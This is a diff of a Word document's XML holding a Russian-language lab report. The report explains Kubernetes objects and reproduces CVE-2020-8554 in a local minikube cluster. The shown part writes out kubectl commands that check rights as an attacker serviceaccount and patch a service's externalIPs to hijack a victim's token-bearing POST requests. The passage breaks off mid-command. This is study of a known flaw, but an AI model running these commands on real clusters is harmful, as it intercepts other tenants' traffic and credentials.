+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">который служит для связи с внешними дисками машины ноды. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Volume</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">предназначен для локального хранения информации внутри ноды. Также объект </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Volume</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">находитя вне самого кластера </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Kubernetes</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Beginingtitlelist"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="40" w:name="_Toc231073615"/>
+      <w:bookmarkStart w:id="41" w:name="_Toc231774177"/>
+      <w:bookmarkStart w:id="42" w:name="_Toc231834645"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Deployment</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="40"/>
+      <w:bookmarkEnd w:id="41"/>
+      <w:bookmarkEnd w:id="42"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3646,6 +3779,39 @@
         <w:rPr>
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
+        <w:t>Deployment - высокоуровневый объект, описывающий желаемое поведение группы подов и управляющий их жизненным циклом.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Beginingtitlelist"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="43" w:name="_Toc231073616"/>
+      <w:bookmarkStart w:id="44" w:name="_Toc231774178"/>
+      <w:bookmarkStart w:id="45" w:name="_Toc231834646"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>STS</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="43"/>
+      <w:bookmarkEnd w:id="44"/>
+      <w:bookmarkEnd w:id="45"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
         <w:t>STS (StatefulSet) - объект kubernetes, который связывает БД из нод с контейнерами приложений с основным хранилищем</w:t>
       </w:r>
       <w:r>
@@ -3659,7 +3825,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="33" w:name="_Toc231774179"/>
+      <w:bookmarkStart w:id="46" w:name="_Toc231834647"/>
       <w:r>
         <w:t xml:space="preserve">Особенности, преимущества и недостатки </w:t>
       </w:r>
@@ -3669,7 +3835,7 @@
         </w:rPr>
         <w:t>Kubernetes</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="33"/>
+      <w:bookmarkEnd w:id="46"/>
     </w:p>
     <w:p>
       <w:r>
@@ -3868,7 +4034,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="34" w:name="_Toc231774180"/>
+      <w:bookmarkStart w:id="47" w:name="_Toc231834648"/>
       <w:r>
         <w:t xml:space="preserve">Существующие аналоги </w:t>
       </w:r>
@@ -3878,7 +4044,7 @@
         </w:rPr>
         <w:t>kubernetes</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="34"/>
+      <w:bookmarkEnd w:id="47"/>
     </w:p>
     <w:p>
       <w:r>
@@ -4002,11 +4168,11 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="35" w:name="_Toc231774181"/>
+      <w:bookmarkStart w:id="48" w:name="_Toc231834649"/>
       <w:r>
         <w:t>вопросы безопасности контейнеризации</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="35"/>
+      <w:bookmarkEnd w:id="48"/>
     </w:p>
     <w:p>
       <w:r>
@@ -4332,12 +4498,12 @@
           <w:numId w:val="25"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="36" w:name="_Toc231774182"/>
+      <w:bookmarkStart w:id="49" w:name="_Toc231834650"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Ход работы</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="36"/>
+      <w:bookmarkEnd w:id="49"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4347,7 +4513,7 @@
           <w:numId w:val="39"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="37" w:name="_Toc231774183"/>
+      <w:bookmarkStart w:id="50" w:name="_Toc231834651"/>
       <w:r>
         <w:t xml:space="preserve">исследование </w:t>
       </w:r>
@@ -4372,7 +4538,7 @@
       <w:r>
         <w:t>.</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="37"/>
+      <w:bookmarkEnd w:id="50"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4425,14 +4591,12 @@
       <w:r>
         <w:t>.</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>externalIPs</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve">, </w:t>
       </w:r>
@@ -4445,14 +4609,12 @@
       <w:r>
         <w:t>.</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>loadBalancer</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t>.</w:t>
       </w:r>
@@ -4465,14 +4627,12 @@
       <w:r>
         <w:t>.</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>ip</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve">. </w:t>
       </w:r>
@@ -4500,25 +4660,21 @@
       <w:r>
         <w:t>.</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>externalIPs</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> или обновлять статус у поля </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>LoadBalancer</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -4537,14 +4693,12 @@
       <w:r>
         <w:t xml:space="preserve">то он может перехватывать трафик к данному </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>ip</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t>.</w:t>
       </w:r>
@@ -4554,14 +4708,12 @@
       <w:r>
         <w:t xml:space="preserve">в отсутвие проверки принадлежности этого </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>ip</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -4589,28 +4741,24 @@
       <w:r>
         <w:t xml:space="preserve"> с данным </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>ip</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">и принимать трафик, идущий на указанный </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>ip</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve">. </w:t>
       </w:r>
@@ -4789,7 +4937,6 @@
                 <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
             <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
@@ -4797,7 +4944,6 @@
               </w:rPr>
               <w:t>Service.spec.externalIPs</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:proofErr w:type="gramEnd"/>
             <w:r>
               <w:rPr>
@@ -4805,7 +4951,6 @@
               </w:rPr>
               <w:t xml:space="preserve">, </w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
@@ -4820,7 +4965,6 @@
               </w:rPr>
               <w:t>.ip</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
@@ -4997,7 +5141,25 @@
               <w:rPr>
                 <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>design-flaw.</w:t>
+              <w:t>design</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>-</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>flaw</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5140,14 +5302,12 @@
               </w:rPr>
               <w:t>.</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
               </w:rPr>
               <w:t>externalIPs</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:lang w:eastAsia="ru-RU"/>
@@ -5333,7 +5493,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="38" w:name="_Toc231774184"/>
+      <w:bookmarkStart w:id="51" w:name="_Toc231834652"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Подготовка ос для исследования </w:t>
@@ -5350,20 +5510,18 @@
       <w:r>
         <w:t>2020-8554</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="38"/>
+      <w:bookmarkEnd w:id="51"/>
     </w:p>
     <w:p>
       <w:r>
         <w:t xml:space="preserve">Для создания локального кластера был использован модуль </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>minikube</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve">, который позволяет создать </w:t>
       </w:r>
@@ -5475,14 +5633,12 @@
       <w:r>
         <w:t xml:space="preserve">для жертвы и атакующего. Также для последнего создан </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>serviceaccount</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -5553,19 +5709,11 @@
       <w:pPr>
         <w:pStyle w:val="-"/>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Yaml</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>-</w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Yaml-</w:t>
       </w:r>
       <w:r>
         <w:t>конфигурация для атакующего</w:t>
@@ -5613,37 +5761,12 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>kubectl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> auth can-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>i</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> create services   -</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>kubectl auth can-i create services   -</w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -5675,7 +5798,6 @@
         </w:rPr>
         <w:t>-as=</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
@@ -5700,15 +5822,9 @@
         </w:rPr>
         <w:t>b:attacker</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -5788,7 +5904,28 @@
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">x = b – namespace </w:t>
+        <w:t>x</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>b</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> – </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>namespace</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">атакующего, будет ответ </w:t>
@@ -5797,7 +5934,10 @@
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>yes)</w:t>
+        <w:t>yes</w:t>
+      </w:r>
+      <w:r>
+        <w:t>)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5833,21 +5973,12 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>kubectl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>kubectl -</w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -5863,23 +5994,7 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>-a create secret generic payment-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>api</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>-token \</w:t>
+        <w:t>-a create secret generic payment-api-token \</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5910,14 +6025,12 @@
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>yaml</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t>-</w:t>
       </w:r>
@@ -6020,19 +6133,11 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Yaml</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">-config </w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Yaml-config </w:t>
       </w:r>
       <w:r>
         <w:t>для</w:t>
@@ -6070,11 +6175,11 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="39" w:name="_Toc231774185"/>
+      <w:bookmarkStart w:id="52" w:name="_Toc231834653"/>
       <w:r>
         <w:t>практическая реализация</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="39"/>
+      <w:bookmarkEnd w:id="52"/>
     </w:p>
     <w:p>
       <w:r>
@@ -6179,13 +6284,7 @@
         <w:t>контейнер и развенуто на рабочей ноде атакующего.</w:t>
       </w:r>
     </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
+    <w:p/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="a"/>
@@ -6265,14 +6364,12 @@
       <w:r>
         <w:t xml:space="preserve">в </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>yaml</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t>-</w:t>
       </w:r>
@@ -6288,14 +6385,12 @@
       <w:r>
         <w:t xml:space="preserve">атакующего было внесено обновление, добавляющее </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>externalIP</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t>:</w:t>
       </w:r>
@@ -6308,37 +6403,12 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>kubectl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -n tenant-b patch service hijack-external-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>api</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> \</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>kubectl -n tenant-b patch service hijack-external-api \</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6400,401 +6470,333 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
+        <w:t>"externalIPs</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>":[</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>"192.0.2.123</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>"]}}</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>' \</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  --as=</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>system:serviceaccount</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>:tenant-</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>b:attacker</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">В данном обновлении был выставлен </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ip</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>–</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> 192.0.2.123, </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">следовательно контейнер перехватчика будет развернут на этом </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ip</w:t>
+      </w:r>
+      <w:r>
+        <w:t>. Следовательно, если жертва отправит данный</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>POST</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> запрос:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>kubectl -n tenant-</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> exec victim -- \</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sh -c 'curl -sS -X POST \</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  -H "Authorization: Bearer $API_TOKEN" \</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    -H "Content-Type: application/json" \</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    -</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>d "{</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>\"amount\":</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
